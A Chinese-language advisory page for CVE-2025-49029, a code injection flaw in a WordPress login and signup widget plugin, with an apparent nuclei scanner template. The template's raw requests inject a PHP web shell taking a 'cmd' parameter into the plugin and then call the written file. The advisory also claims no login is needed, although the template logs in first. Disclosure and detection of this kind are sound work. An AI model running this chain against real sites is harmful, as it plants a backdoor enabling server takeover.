漏洞信息
漏洞名称: WordPress Custom Login And Signup Widget Plugin 代码注入漏洞
漏洞编号:
漏洞类型: 代码注入
漏洞等级: 高危
漏洞描述: WordPress Custom Login And Signup Widget Plugin是一款用于WordPress网站的登录和注册小工具插件,旨在为用户提供自定义的登录和注册界面。该插件广泛应用于需要增强用户登录和注册功能的WordPress网站中。
该插件在1.0及之前版本中存在代码注入漏洞,属于’代码注入’类型。漏洞的根源在于插件未能正确控制代码的生成,导致攻击者可以通过构造特殊的请求,在服务器上执行任意代码。具体来说,攻击者可以通过发送特制的POST请求到插件的管理页面,注入恶意PHP代码,进而通过GET请求执行任意系统命令。
此漏洞的安全风险较高,攻击者可以利用此漏洞在受影响的服务器上执行任意代码,可能导致服务器被完全控制,数据泄露,甚至服务中断。由于漏洞的利用不需要认证,且可以自动化执行,因此对使用该插件的网站构成了严重威胁。建议所有使用该插件的网站管理员立即升级到最新版本,以避免潜在的安全风险。
产品厂商: bitto.Kazi
产品名称: Custom Login And Signup Widget
影响版本: <= 1.0
来源: https://github.com/projectdiscovery/nuclei-templates/blob/9db63cecd123672e5a66059e88d66358600b1de9/http%2Fcves%2F2025%2FCVE-2025-49029.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49
| id: CVE-2025-49029
info: name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution author: pussycat0x severity: high description: | Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0 reference: - https://github.com/Nxploited/CVE-2025-49029 tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- | POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: {{BaseURL}}/wp-admin/options-general.php?page=custom-login-and-signup-widget Content-Type: application/x-www-form-urlencoded Content-Length: 121 Origin: {{BaseURL}} Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i
text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
- | GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - contains(body_2, "custom-login-and-signup-widget") - status_code_3 == 500 condition: and
|